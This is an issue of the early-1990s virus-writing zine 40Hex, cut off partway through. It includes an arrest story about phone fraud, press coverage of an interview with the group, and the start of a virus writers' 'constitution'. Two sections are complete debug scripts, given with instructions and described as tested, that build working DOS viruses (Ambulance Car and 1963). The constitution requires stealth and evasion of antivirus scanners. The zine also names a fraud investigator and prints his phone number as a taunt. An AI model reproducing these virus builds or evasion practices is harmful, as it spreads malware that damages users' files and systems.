40Hex Number 5 Volume 2 Issue 1


        Welcome to Issue 5 of 40Hex, the monthy semi-annual magazine 
published for all those interested in learning more about computer viruses.
        Lots of new news:

  1) Well, Hellraiser has lost computer and housing temporarily, so DecimatoR
     had taken over the magazine.  There has been so much new stuff, a lot got
     changed since the time I received this issue.  Special BIG ASS greets to
     him for all of his work on this issue.
  2) Digital Warfare is down, as Instigator got busted for phreaking.  We will
     let you know more when we know more.  Before its demise, its virus
     collection had grown incredibly, thus stocking 40Hex for life.
  3) LandFill BBS went back up. I am back in the scene again.  Give it a ring.
  4) As of the release of this file, I have heard of more busts, specifically,
     Gengis Kahn and Rain Man.... could be rumor.

     BTW, for those of you who have the "Anti-FiRe" virus, SCAN 86 catches
     it as "Infinity"... probably due to the text it contains.  Course, it was
     distributed on a VGA loader for the InFiniTy boards... heh heh heh...

                                              DecimatoR

                                              -)GHeap


                             40 Hex Mag Issue 5

        File 000..............................You Are Here
        File 001..............................BUSTED! Instigator's Story
        File 002..............................Virus Spotlight: Ambulance Car
        File 003..............................The 1963 Virus
        File 004..............................Alliance w/McAfee and Dvorak
        File 005..............................Virus Author's Constitution
        File 006..............................The SKISM Vengeance Virus Hex
        File 007..............................Finding Scan Strings II


Greets go out to: Hellraiser, Dark Angel, Demogorgon, Piff', Paragon Dude
                  Instigator, Night Crawler, Crow Meister, Lazarus Long,
                  Time Lord, Axiom Codex, and the rest of the Alliance crew.
40Hex Number 5 Volume 2 Issue 1                                      File 001


                         Instigator --- Busted!

At 2:40 pm EST, Jan 20, '92 a local cop pulled Instigator (me) out of my very
entertaining Social Studies class and informed me he, 1 other local cop and
2 MCI phone fraud investigators were gonna serve a warrant on my house and
confiscate my computer shit.  So the cop takes me to my house and they start
disassembling all of my computer stuff, and take all of my notes and shit.
They filmed all this.  They informed me I would be charged with theft of
services, credit card fraud and a bunch of other shit, like 3 felonys and
5 misdimeanors till they were done.  Anyways its about a week and a half 
after the incident now and they only formally charged me with theft of 
services.  So the worst that is gonna happen is I will get 1 year of 
probation.  The best thing is they are thinking of only giving me a citation
or totally dropping the charges.  I am suppose to get my system back after
the DA comes to my house so I can show him how I did it.  As for Digital
Warfare I wanna give to someone to set up.  Anyway I made it to the front
page of 3 local newspapers so here is one of the articles:


-------------------------------------------------------------------------------

               (Shit inside the ***( )*** are my comments)

                       From the front page of the     
                         Intelligencer Journal            

               2 "Hackers" caught stealing phone service
  
  Using sophisticated computers and telephones, two Lancaster County
computer hackers touched MCI, a Washington-based telephone communications
network, for approximately $4,700 last year. ***( Sophisticated phones? )***

  Their activities represent "only the tip of the iceberg" of 
telecommunications fraud, which carries an annual $1 billion to $1.5 billion
price tag, according to John Houser, a MCI spokesman. ***( Dick )***

  The two are accused of accessing MCI's computer and obtaining "25 card 
numbers, thet we know about," Houser said.  "We know they made calls all over
the United Sates, to Canada, Great Britain, and West Germany"

  "None of the card numbers have been issued to Lancaster subscribers," 
Houser said. 

  Columbia police are charging an 18 year old borough resident with credit 
card fraud, unlawful use of a computer, theft of services, and criminal 
conspiracy according to Sgt. C. Joseph Smith. Police are withholding his 
identity until he is formally charged, Smith said.

  West Donegal Township chief Charles R. Bronte said a fifteen year old 
suspect ***( that's me! )*** living in his jurisdiction was being refered to
juvenile authorities by the department investigator, Cpl. Kenton Whitebread.

  Officers with both departments said this was an entirely new kind of 
criminal case for them.

  "I'm still going over our suspectes statement," said Smith, "and even when
I'm done, I don't think I'm going to understand (all the technical jargon). 
We're getting a lot of help from MCI."

  "If our juvenile hadn't cooperated, it's possible we'd still be looking at
his equipment", Bronte said.  "He went into the computer, using his access
codes," ***( He means I logged on my board )*** " to retrieve the information
necessary to continue the investigation".

  Police confiscated computer telephone equipment, whose value is estimated
***( Estimated - Gimme a break!)***  in the thousands of dollars, when they
executed search warrants at the residences of both suspects, Jan. 20.

  "It was a real United Nations collection," said Bronte, "There were a 
number of different manufacturers" of the equipment taken in West Donegal.
***( United Nations collection? )***

  Most of the equipment taken in Columbia was made by Tandy, Smith said. 

  Both posessed programs and equipment which allowed their computers to 
generate thousands of random numbers. 

  Houser said that once an individual had knowledge of MCI's calling card
format "they could access our computer switching equipment, and begin 
generating random numbers. ***( they make it sound so technical )*** They
could allow their equipment to run 24 hours a day."

  Houser declined discussing the company security, but acknowledged "We
became aware of an unusual number of calls coming into our computer line. We
eventually were able to trace those calls back to the originating telephone 
equipment." ***( ANI )***

   Bronte said MCI investigators arrived at his department early Monday
afternoon.  The warrant was executed at 2 pm, Bronte said.  "We took
investigators to the suspects home, while Cpl. Whitebread picked up the
boy at his school. 
	
	Smith said the Columbia warrant was served at 5:18pm on Monday.
The suspect and another individual were working on his computer at the time.
"They weren't doing anything illegal," he said.

	Smith said MCI first became aware of the two local hackers "about
Dec. 14".  They were monitoring them since."

	The officers said they did not believe either of the two profited
from their activities. ***( Free Phone calls! )***

	"I think it was just a case of him getting involved in someting that
was entirely over his head, Bronte said.  ***( Yeah, right )***

	Houser said MCI's investigation was continuing.

	"We have reason to believe they shared some of their information with
others," he said. "At this time I can tell you we have no other suspects in
Pennsylvania, but that could change tomorrow."

	He said investigators were unsure at present if any of the computer
data had been transmitted to other hackers. ***( They said one paragraph up
that they thought we shared some of the information.. Duh )***

-------------------------------------------------------------------------------
    Update --
    ------

  Here is the current casualties on the 476-9696 system, which is owned by
  TeleConnect, a subsidiary of MCI.

Instigator    -----  $1970.70  -----  Theft of Services(1 Count)
Asphi         -----  $2700.00  -----  Unlawful Use of Computer
                                      Credit Card Fraud
                                      Theft Of Services
                                      Criminal Conspiracy
Dekion        -----   UNKNOWN  -----  UNKNOWN
Count Zero    -----  $83.63    -----  No Charges Just Billed (*)
VenoM         -----  $75.00    -----  No Charges Just Billed (*)

   Apparently the head of the operations is Terry Oakes.  He is the phone
   Fraud investigator in charge of the TeleConnect Investigations.  Give him a
   ring at 800-476-1234 Ext. 3045.  Thank you.

(*) In both cases parents were notified.
                                                -)GHeap

40Hex Number 5 Volume 2 Issue 1                                      File 002

                           Virus Spotlight:
                       The Ambulance Car Virus  

Here's a debug script of the Ambulance Car virus.  I've tested the virus
created from this, and it works.  Ambulance Car is a parasitic, non-resident
.COM infector.  It spreads rapidly, and has one of the neatest graphic
displays that I've seen yet in a virus.  When it activates, a little ambulance
drives across the bottom of the screen, from left to right, and a siren is
heard over the PC speaker.  Other than that, all this thing does is replicate.

To create the virus from the debug script, cut between the dotted lines and
type:

  DEBUG < REDX.TXT > NUL
 
-------------------------------------------------------------------------------

n redx.com
e 0100  EB 37 90 48 65 6C 6C 6F 20 2D 20 43 6F 70 79 72 
e 0110  69 67 68 74 20 53 20 26 20 53 20 45 6E 74 65 72 
e 0120  70 72 69 73 65 73 2C 20 31 39 38 38 0A 0D 24 1A 
e 0130  B4 09 BA 03 01 CD 21 CD 20 E8 01 00 01 5E 81 EE 
e 0140  03 01 E8 1A 00 E8 17 00 E8 D2 01 8D 9C 19 04 BF 
e 0150  00 01 8A 07 88 05 8B 47 01 89 45 01 FF E7 C3 E8 
e 0160  DE 00 8A 84 28 04 0A C0 74 F4 8D 9C 0F 04 FF 07 
e 0170  8D 94 28 04 B8 02 3D CD 21 89 84 17 04 8B 9C 17 
e 0180  04 B9 03 00 8D 94 14 04 B4 3F CD 21 8A 84 14 04 
e 0190  3C E9 75 3F 8B 94 15 04 8B 9C 17 04 83 C2 03 33 
e 01A0  C9 B8 00 42 CD 21 8B 9C 17 04 B9 06 00 8D 94 1C 
e 01B0  04 B4 3F CD 21 8B 84 1C 04 8B 9C 1E 04 8B 8C 20 
e 01C0  04 3B 84 00 01 75 0C 3B 9C 02 01 75 06 3B 8C 04 
e 01D0  01 74 64 8B 9C 17 04 33 C9 33 D2 B8 02 42 CD 21 
e 01E0  2D 03 00 89 84 12 04 8B 9C 17 04 B8 00 57 CD 21 
e 01F0  51 52 8B 9C 17 04 B9 19 03 8D 94 00 01 B4 40 CD 
e 0200  21 8B 9C 17 04 B9 03 00 8D 94 14 04 B4 40 CD 21 
e 0210  8B 9C 17 04 33 C9 33 D2 B8 00 42 CD 21 8B 9C 17 
e 0220  04 B9 03 00 8D 94 11 04 B4 40 CD 21 5A 59 8B 9C 
e 0230  17 04 B8 01 57 CD 21 8B 9C 17 04 B4 3E CD 21 C3 
e 0240  A1 2C 00 8E C0 1E B8 40 00 8E D8 8B 2E 6C 00 1F 
e 0250  F7 C5 03 00 74 17 33 DB 26 8B 07 3D 50 41 75 08 
e 0260  26 81 7F 02 54 48 74 0B 43 0B C0 75 EB 8D BC 28 
e 0270  04 EB 32 83 C3 05 8D BC 28 04 26 8A 07 43 0A C0 
e 0280  74 19 3C 3B 74 05 88 05 47 EB EF 26 80 3F 00 74 
e 0290  0A D1 ED D1 ED F7 C5 03 00 75 DB 80 7D FF 5C 74 
e 02A0  04 C6 05 5C 47 1E 07 89 BC 22 04 B8 2A 2E AB B8 
e 02B0  43 4F AB B8 4D 00 AB 06 B4 2F CD 21 8C C0 89 84 
e 02C0  24 04 89 9C 26 04 07 8D 94 78 04 B4 1A CD 21 8D 
e 02D0  94 28 04 33 C9 B4 4E CD 21 73 08 33 C0 89 84 28 
e 02E0  04 EB 29 1E B8 40 00 8E D8 D1 CD 33 2E 6C 00 1F 
e 02F0  F7 C5 07 00 74 06 B4 4F CD 21 73 E7 8B BC 22 04 
e 0300  8D 9C 96 04 8A 07 43 AA 0A C0 75 F8 8B 9C 26 04 
e 0310  8B 84 24 04 1E 8E D8 B4 1A CD 21 1F C3 06 8B 84 
e 0320  0F 04 25 07 00 3D 06 00 75 15 B8 40 00 8E C0 26 
e 0330  A1 0C 00 0B C0 75 08 26 FF 06 0C 00 E8 02 00 07 
e 0340  C3 1E BF 00 B8 B8 40 00 8E D8 A0 49 00 3C 07 75 
e 0350  03 BF 00 B0 8E C7 1F BD F0 FF BA 00 00 B9 10 00 
e 0360  E8 3F 00 42 E2 FA E8 16 00 E8 7B 00 45 83 FD 50 
e 0370  75 E8 E8 03 00 1E 07 C3 E4 61 24 FC E6 61 C3 BA 
e 0380  D0 07 F7 C5 04 00 74 03 BA B8 0B E4 61 A8 03 75 
e 0390  08 0C 03 E6 61 B0 B6 E6 43 8B C2 E6 42 8A C4 E6 
e 03A0  42 C3 51 52 8D 9C BF 03 03 DA 03 D5 0B D2 78 34 
e 03B0  83 FA 50 73 2F BF 80 0C 03 FA 03 FA 2B D5 B9 05 
e 03C0  00 B4 07 8A 07 2C 07 02 C1 2A C2 83 F9 05 75 0A 
e 03D0  B4 0F F7 C5 03 00 74 02 B0 20 AB 83 C3 10 81 C7 
e 03E0  9E 00 E2 DD 5A 59 C3 1E B8 40 00 8E D8 A1 6C 00 
e 03F0  3B 06 6C 00 74 FA 1F C3 22 23 24 25 26 27 28 29 
e 0400  66 87 3B 2D 2E 2F 30 31 23 E0 E1 E2 E3 E4 E5 E6 
e 0410  E7 E7 E9 EA EB 30 31 32 24 E0 E1 E2 E3 E8 2A EA 
e 0420  E7 E8 E9 2F 30 6D 32 33 25 E1 E2 E3 E4 E5 E7 E7 
e 0430  E8 E9 EA EB EC ED EE EF 26 E6 E7 29 59 5A 2C EC 
e 0440  ED EE EF F0 32 62 34 F4 09 00 E9 36 00 EB 2E 90 
e 0450  05 00 EB 2E 90 

rcx
0355
w
q

-------------------------------------------------------------------------------
                                                                            DA
40Hex Number 5 Volume 2 Issue 1                                      File 003

                               The 1963 Virus
                             
        Here's a debug script of 1963.  It's classified as an overwriting
virus, but it attaches the code it overwrites onto the end of the file it
infects...  so it overwrites, but it doesn't.  Sort of.

-------------------------------------------------------------------------------

n 1963.com
e 0100  B4 30 CD 21 3C 03 72 07 B8 00 12 CD 2F 3C FF B8 
e 0110  0B 00 72 71 B4 4A BB 40 01 CD 21 72 68 FA 0E 17 
e 0120  BC FE 13 E8 C5 00 FB A1 2C 00 0B C0 74 61 E8 BB 
e 0130  06 8E C0 33 FF 33 C0 AF 75 FD AF 8B D7 06 1F B4 
e 0140  48 BB FF FF CD 21 B4 48 CD 21 8E C0 B4 49 CD 21 
e 0150  33 C0 8B CB 8C C3 51 B9 08 00 33 FF F3 AB 43 8E 
e 0160  C3 59 E2 F2 0E 07 BB 04 09 8B FB AB B0 80 AB 8C 
e 0170  C8 AB B8 5C 00 AB 8C C8 AB B8 6C 00 AB 8C C8 AB 
e 0180  B8 00 4B CD 21 0E 1F E8 62 06 2E FF 2E 0A 00 B8 
e 0190  20 12 BB 05 00 CD 2F 53 4B 4B 26 88 1D B8 16 12 
e 01A0  CD 2F 4B 4B 26 89 1D B4 48 BB FF FF CD 21 B4 48 
e 01B0  CD 21 8E D8 5B B8 00 42 33 C9 33 D2 CD 21 B4 3F 
e 01C0  BA 00 01 26 8B 4D 11 CD 21 72 BA B4 3E CD 21 B4 
e 01D0  26 8C DA CD 21 4A 8E C2 26 8C 1E 01 00 42 8E C2 
e 01E0  8E D2 BC FE FF 1E B8 00 01 50 CB 1E B8 03 12 CD 
e 01F0  2F 2E 8C 1E 04 09 33 F6 8E DE BF 88 02 8C CE 87 
e 0200  3E 04 00 87 36 06 00 9C 9C 9C 8B EC 80 4E 01 01 
e 0210  9D 9C 9C 2E C7 06 06 09 AF 08 B4 01 FF 1E 4C 00 
e 0220  9D 2E C7 06 06 09 AB 08 B4 0B FF 1E 84 00 9D 89 
e 0230  3E 04 00 89 36 06 00 1F 1E 06 8C CB BD AE 02 A1 
e 0240  AB 08 8B 16 AD 08 33 F6 8E DE 3B 06 84 00 75 10 
e 0250  3B 16 86 00 75 0A 89 2E 84 00 89 1E 86 00 EB 25 
e 0260  B8 AB 08 8E C3 B9 10 00 FC 8B F8 8E DA A7 75 0B 
e 0270  A7 75 06 89 6C FC 89 5C FE 4E 4E 4E E2 EB 87 F1 
e 0280  42 3B D3 75 E4 07 1F C3 55 8B EC 50 8B 46 04 2E 
e 0290  3B 06 04 09 77 15 53 2E 8B 1E 06 09 2E 89 47 02 
e 02A0  8B 46 02 2E 89 07 80 66 07 FE 5B 58 5D CF 55 8B 
e 02B0  EC 80 FC 48 74 0A 80 FC 4A 74 05 3D 03 4B 75 0C 
e 02C0  E8 89 05 E8 AF 05 9C E8 87 05 EB 55 80 FC 31 74 
e 02D0  05 80 FC 4C 75 0D 53 BB 13 00 E8 55 02 4B 79 FA 
e 02E0  5B EB 5F 80 FC 0F 74 0F 80 FC 10 74 0A 80 FC 17 
e 02F0  74 05 80 FC 23 75 05 E8 25 05 EB 46 80 FC 3F 75 
e 0300  25 E8 2E 02 73 06 B8 05 00 E9 F7 00 75 34 E8 64 
e 0310  05 72 F6 9C E8 6D 05 1E 07 8B FA E8 67 04 E8 75 
e 0320  05 9D 5D CA 02 00 80 FC 3D 74 0A 80 FC 43 74 05 
e 0330  80 FC 56 75 05 E8 E1 01 EB 08 80 FC 3E 75 0E E8 
e 0340  F0 01 FF 76 06 9D 5D FA 2E FF 2E AB 08 80 FC 14 
e 0350  74 0D 80 FC 21 74 08 80 FC 27 74 03 E9 7F 00 E8 
e 0360  BD 04 73 04 5D B0 01 CF 75 D8 E8 17 05 E8 A4 04 
e 0370  80 FC 14 75 14 8B 44 0C BA 80 00 F7 E2 33 DB 02 
e 0380  44 20 12 E3 13 DA 93 EB 06 8B 44 23 8B 5C 21 8B 
e 0390  4C 0E F7 E1 73 05 E8 FD 04 EB C9 93 F7 E1 03 D3 
e 03A0  72 F4 2E A3 D0 08 2E 89 16 D2 08 2E 89 0E D4 08 
e 03B0  E8 E3 04 E8 BF 04 0A C0 74 04 3C 03 75 1E E8 C3 
e 03C0  04 80 FC 27 2E A1 D4 08 75 04 F7 E1 72 C8 50 B4 
e 03D0  2F CD 21 8B FB 58 E8 AC 03 E8 BA 04 5D CF 3D 00 
e 03E0  4B 74 2A 3D 01 4B 74 03 E9 57 FF E8 41 00 72 13 
e 03F0  56 57 1E 0E 1F BE E2 08 8D 7F 0E FC A5 A5 A5 A5 
e 0400  1F 5F 5E 9C D0 6E 06 9D D0 56 06 5D CF E8 1F 00 
e 0410  72 F1 50 B4 51 CD 21 8E DB 8E C3 58 FA 2E 8B 26 
e 0420  E2 08 2E 8E 16 E4 08 44 44 FB 2E FF 2E E6 08 E8 
e 0430  52 04 F9 E8 E4 00 B8 0B 00 72 32 FC 9C 1E B8 22 
e 0440  35 CD 21 2E 89 1E B7 08 2E 8C 06 B9 08 C5 76 0A 
e 0450  0E 07 BF D4 08 8B DF B9 07 00 F3 A5 1F E8 EC 03 
e 0460  52 B8 01 4B E8 12 04 5A E8 E6 03 73 07 89 46 08 
e 0470  E8 23 04 C3 89 46 08 B4 51 CD 21 8E C3 8B 76 00 
e 0480  36 C5 54 02 26 89 16 0A 00 26 8C 1E 0C 00 B8 22 
e 0490  25 CD 21 9D 75 DA 0E 1F BE 04 09 BF 00 01 B9 AB 
e 04A0  07 F3 A4 E8 B2 02 74 03 F8 EB C5 8B FB 83 C7 10 
e 04B0  A1 B1 10 A3 E6 08 A1 B3 10 03 C7 A3 E8 08 8B 0E 
e 04C0  AF 10 0B C9 74 E2 C5 56 0E E8 96 03 72 35 8B D8 
e 04D0  51 0E 1F 33 C9 8B 16 02 09 E8 8F 03 BA 04 09 59 
e 04E0  51 B9 04 00 E8 7D 02 59 72 16 8B F2 1E 8B 44 02 
e 04F0  8B 34 03 C7 8E D8 01 3C 1F E2 E5 E8 69 03 EB A8 
e 0500  E8 64 03 06 1F 2E C4 1E B7 08 89 1E 0A 00 8C 06 
e 0510  0E 00 E8 D7 02 F9 E9 1D FF F8 50 53 9C E8 42 03 
e 0520  72 0C 8B D8 9D 9C E8 0A 00 9C E8 3A 03 9D 5B 5B 
e 0530  58 C3 F8 FC E8 4D 03 9C 53 B8 20 12 CD 2F 72 0C 
e 0540  32 FF 26 8A 1D B8 16 12 CD 2F 73 04 E8 47 03 C3 
e 0550  06 0E 1F B8 23 35 CD 21 89 1E BB 08 8C 06 BD 08 
e 0560  40 CD 21 89 1E BF 08 8C 06 C1 08 B4 25 BA 81 08 
e 0570  CD 21 48 42 42 CD 21 07 5B B0 02 26 86 45 02 A2 
e 0580  C9 08 26 8B 45 05 A3 CA 08 26 8B 45 15 A3 D0 08 
e 0590  26 8B 45 17 A3 D2 08 26 8B 45 11 26 8B 55 13 A3 
e 05A0  CC 08 89 16 CE 08 3D 1A 00 83 DA 00 72 55 9D 72 
e 05B0  16 26 8B 45 28 3D 45 58 74 07 3D 43 4F 75 44 B0 
e 05C0  4D 26 3A 45 2A 75 3C 33 C9 33 D2 E8 9D 02 BA EA 
e 05D0  08 B1 1A E8 8E 01 72 3D 33 C9 33 D2 E8 79 01 75 
e 05E0  0B A1 F2 08 B2 10 F7 E2 8B CA 8B D0 51 52 81 C2 
e 05F0  AB 07 83 D1 00 3B 0E CE 08 75 04 3B 16 CC 08 5A 
e 0600  59 76 02 EB 58 51 52 E8 61 02 BA 04 09 B9 AB 07 
e 0610  E8 51 01 73 02 EB 3F 06 57 0E 07 BE EF 09 BF EB 
e 0620  01 B9 C3 00 F3 A6 5F 07 75 5F 8B D1 E8 41 02 B9 
e 0630  AD 07 BA 04 09 E8 20 01 75 03 83 C1 06 26 01 4D 
e 0640  11 26 83 55 13 00 E8 1B 01 72 0B 8B F2 49 49 E8 
e 0650  26 01 3B 14 74 03 F9 EB 08 3A C0 EB 04 B0 01 3C 
e 0660  00 9C BE C9 08 FC 47 47 A4 47 47 A5 83 C7 0A A5 
e 0670  A5 A5 A5 B8 24 25 C5 16 BF 08 CD 21 48 2E C5 16 
e 0680  BB 08 CD 21 9D E8 0E 02 C3 26 F6 45 04 04 75 CD 
e 0690  B4 0D CD 21 53 1E 06 B8 40 35 CD 21 89 1E C3 08 
e 06A0  8C 06 C5 08 B0 13 CD 21 89 1E B3 08 8C 06 B5 08 
e 06B0  B4 25 C5 16 AF 08 CD 21 B0 40 BA 59 EC BB 00 F0 
e 06C0  8E DB CD 21 07 1F 5B 33 C9 33 D2 E8 A2 01 B9 AB 
e 06D0  07 BE 04 09 E8 81 00 75 15 83 C1 06 A1 F0 08 A3 
e 06E0  AF 10 A1 FE 08 A3 B1 10 A1 00 09 A3 B3 10 56 E8 
e 06F0  86 00 89 14 5A 41 41 E8 74 00 72 39 5A 59 E8 6A 
e 0700  01 BA 00 01 B9 AB 07 E8 64 00 72 2F E8 49 00 75 
e 0710  20 33 C9 89 0E F0 08 89 16 FE 08 C7 06 00 09 F0 
e 0720  FF 33 D2 E8 45 01 BA EA 08 B9 1A 00 E8 3F 00 72 
e 0730  0A 3A C0 EB 07 B0 01 3C 00 EB 01 F9 9C B4 0D CD 
e 0740  21 1E B8 13 25 C5 16 B3 08 CD 21 B0 40 2E C5 16 
e 0750  C3 08 CD 21 1F E9 0A FF A1 EA 08 3D 4D 5A 74 03 
e 0760  3D 5A 4D C3 B4 3F E8 10 01 72 02 3B C1 C3 B4 40 
e 0770  E8 06 01 72 02 3B C1 C3 51 33 D2 AC 02 D0 80 D6 
e 0780  00 E2 F8 59 C3 0E 1F BE 04 09 8B D8 B9 AB 07 E8 
e 0790  C6 FF 75 27 A1 F2 08 BA 10 00 F7 E2 53 57 E8 1E 
e 07A0  00 5F 5B BE EA 08 B9 1A 00 A1 AF 10 A3 F0 08 A1 
e 07B0  B1 10 A3 FE 08 A1 B3 10 A3 00 09 33 C0 33 D2 2B 
e 07C0  06 D0 08 1B 16 D2 08 72 0A 75 20 2B D8 76 1C 03 
e 07D0  F8 EB 0F F7 D8 83 D2 00 F7 DA 75 0F 2B C8 76 0B 
e 07E0  03 F0 3B CB 76 02 8B CB FC F3 A4 C3 9C E8 94 00 
e 07F0  B4 49 1E 07 CD 21 B4 49 8E 06 2C 00 CD 21 B4 50 
e 0800  8B 1E 16 00 CD 21 B8 22 25 C5 16 0A 00 CD 21 E8 
e 0810  84 00 9D C3 8B F2 80 3C FF 75 03 83 C6 07 C3 E8 
e 0820  62 00 E8 EF FF 0E 07 BA 04 09 8B FA FC AC 0A C0 
e 0830  74 05 04 40 B4 3A AB A5 A5 A5 A5 B0 2E AA A5 A4 
e 0840  32 C0 AA 06 1F E8 D1 FC E8 4B 00 C3 50 8C C8 EB 
e 0850  03 50 33 C0 53 1E 8C CB 4B 8E DB A3 01 00 1F 5B 
e 0860  58 C3 B8 00 3D EB 12 B4 3E EB 0E B8 00 42 EB 09 
e 0870  B8 02 42 EB 04 FF 76 06 9D 9C FA 2E FF 1E AB 08 
e 0880  C3 B0 03 CF 2E 8F 06 C7 08 1E 52 06 53 50 51 56 
e 0890  57 55 8B EC EB 10 2E 8F 06 C7 08 8B E5 5D 5F 5E 
e 08A0  59 58 5B 07 5A 1F 2E FF 26 C7 08 00 00 00 00 00 
e 08B0  00 00 00 00 00 44 83 00 00 44 83 00 00 44 83 00 
e 08C0  00 44 83 00 00 44 83 00 00 00 00 00 00 00 00 00 
e 08D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
e 08E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
e 08F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

rcx
0800
w
q

-------------------------------------------------------------------------------
                                                                            DA
40Hex Number 5 Volume 2 Issue 1                                      File 004

                               Forty Hex 5
                                Presents

                        An Alliance Interview with
                         John McAfee + Jon Dvorak
                                   and
                     Hellraiser, Garbageheap, DecimatoR,
                      Count Zero, CRoW MeiSTeR, Instigator,
                       Demogorgon, Dark Angel, Night Crawler,
                        VenoM, Time Lord, Darkman.

    On Feb. 2nd of 1992, an alliance was run with members of PHALCON/SKISM,
    NuKE, and Ex-RABiD.  We started the conference by trying to call Patti
    Hoffman, who had a shit fit, and denied being the author of VSUM.  Nice
    of her to insult our intelligence.  But anyways, we then called McAfee,
    who was surprisingly a nice guy.  He was interested in what we had to say.
    Some of the topics covered were which viruses we had written, what types
    of viri they were(i.e. MemRes, Stealth...).  Another important topic
    covered the Bob Ross Virus which an associate of McAfee had misnamed the
    Beta Virus(it was first spread on a false version of BNU(1.90Beta)).

    On the following day, we started a second alliance, this time involving
    Count Zero, CRoW MeiSTeR, Dark Angel, Demogorgon, Garbageheap(moi!),
    Hellraiser, Instigator, Night Crawler and Time Lord.  Also in the
    conference were John Markoff(New York Times), Michael Alexander(Computer
    World), and John McAfee.  A variety of topics were covered, I won't go into
    specifics here, because in a future issue we will have a full transcript,
    and in this issue we will have the article from the Feb. 10,1992 Vol.XXVI
    No. 6 issue of COMPUTERWORLD.

    ---------------------------------------------------------------------------
    CHALLENGE, NOTORIETY CITED AS IMPETUS FOR VIRUS DEVELOPERS(*Catchy title*)
                        By: Michael Alexander/CW STAFF

         What motivates a programmer to write a virus?  The thrill, declared
    Hell Raiser,(* that is supposed to be Hellraiser *) a self-styled virus
    author and a member of Phalcon/Skism, a group of about a dozen computer
    hackers scattered across North America.
         In an unusual telephone conference call to COMPUTERWORLD last week, 10
    callers who said they were members of Phalcon/Skism claimed to be
    responsible for writing several of the viruses now on the
    loose.(* CLAIMED?!?!?!!  Well, I suppose that he couldnt know if we were the
    real McCoy *)
         To protect their identities, the callers used such handles as Garbage
    Heap(* Grabbin' top billin'! *), Nightcrawler, Demogorgon, Dark Angel, and
    Time Lord.  They said their ages range from 15 to 23 years old, although
    COMPUTERWORLD could not independantly verify their identities.

    GETTING ATTENTION
    -----------------
         The virus authors, as they called themselves, said they arranged the
    teleconference to air their side of the story, and to talk about their
    unorthadox and contradictory brand of computer ethics. (* Well... close,
    we were real bored... of course, who wants to talk to bored virus
    authors... *)  "For the most part, virus authors are seen as a lot more
    malicious than we actually are," Garbage Heap said.
         His compatriots said they write viruses mainly for the thrill but
    also for the challenge and the status it brings within the computer
    underground.  The group said it is not interested in doing harm, and
    seldom creates viruses that are deliberately designed to cause damage.
    "It's sort of like graffiti  -  getting our name across  -  and damage
    happens in the process," he claimed.(* Hellraiser *)
         As an example of the type of virus they write, the group took credit
    for writing the Bob Ross Virus, named after the painter of the same name on
    who hosts a show on Public Broadcasting Service.
         "What it does is infect files and randomly displays 'Bobisms,' which
    are messages Bob Ross would say," Hell Raiser said.  "It doesn't format
    the hard drive or do any damage."
         However, other alleged members of Phalcon/Skism later admitted to
    writing viruses that are clearly intended to damage or destroy programs
    and data.(* Hellraiser again... *)
         The callers contended that they are virus "authors," not virus
    "spreaders," and that they are not responsible for the problems their
    creations cause.
         "The main difference is that an author may write a virus and may even
    upload that virus to a virus board, a [bulletin Board system] oriented to
    virus programmers and spreaders," one virus author explained.
         "People, like a disgruntled employee who may have a gripe with
    someone else, download it and spread it that way," this virus author said.

    NOT LAWBREAKERS
    ---------------
         The virus authors also pointed out that since the act of writing a
    virus is not prohibited by law, they should not be viewed as criminals.
         The callers claimed that even if the group stopped writing viruses,
    the number of infections would not decline.  The problem of viruses has
    grown so large that new viruses have no impact overall, one said.
         "Our effect is fairly little," he asserted.
         The callers said that they have been writing viruses for about a
    year, and would probably continue for at least another year.  Eventually,
    they hope to find jobs as full time programmers, several said.
         There is no way to verify the callers' claims.  However, many of the
    monikers the callers used, as well as the name "Phalcon/Skism," have shown
    up in perhaps as many as half  -  about 100  -  of the viruses to appear
    in the past six or seven months, said John McAfee, president of McAfee
    Associates, an antivirus software publisher based in Santa Clara,Calif.
         The quality of the viruses is "mediocre," Mcafee said. (* Cant win
    'em all can we, John? *)
    ---------------------------------------------------------------------------

    My thoughts on the article was that it was neutral, Mr. Alexander could
    have easily ripped us apart.  We didnt expect to come out looking like
    heros, so why should we bitch.  Next month prepare for the official
    transcript of the interview.  Then we can truly establish what was said.

                                                -)GHeap


40Hex Number 5 Volume 2 Issue 1                                      File 005

                  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
                  The Constitution of Worldwide Virus Writers
                  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
                      Initial Release - February 12, 1992
                  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  
       We, the members of PHALCON/SKISM, in order to form a more perfect
  environment worldwide for the virus community, establish justice, ensure
  intracommunity tranquility, provide for the common defense and offense,
  promote the general welfare, and secure the blessings of liberty to
  ourselves and our posterity, do ordain and establish this Constitution of
  Worldwide Virus Writers.
  
       ARTICLE I - REGARDING ORIGINAL VIRII
            Section A - DEFINITION
                 The term "original virus" herein indicates programming done
                 exclusively by either one individual or group, with no code
                 taken from any other source, be it a book or another virus.
            Section B - CODE REQUIREMENTS
                 For an original virus to conform to the standards set by
                 this document, it must include the following:
                   1) The title of the virus in square brackets followed by a
                      zero byte should be in the code, in a form suitable for
                      inclusion into SCAN(1).  This is to ensure that the
                      name of the virus is known to those examining it.
                   2) The name of the author and his/her group affilition/s
                      should be included in the code, followed by a zero
                      byte.  At the present, this is an optional requirement.
                   3) Some form of encryption or other form of stealth
                      techniques must be used.  Even a simple XOR routine
                      will suffice.
                   4) If the virus infects files, the code should be able to
                      handle infection of read only files.
                   5) It must have some feature to distinguish it from other
                      virii.  Creativity is encouraged above all else.
                   6) The virus must not be detectable by SCAN.
            Section C - IMPLEMENTATION
                 This section, and all sections hereafter bearing the heading
                 "IMPLEMENTATION" refer to the recommended method of
                 implementation of the suggestions/requirements listed in the
                 current article.
                   1) Virus_Name db '[Avocado]',0
                   2) Author     db 'Dark Angel, PHALCON/SKISM',0
  
       ARTICLE II - REGARDING "HACKED" VIRII
            Section A - DEFINITION
                 The term "hacked virus" herein refers to any virus written
                 by either one individual or a group which includes code
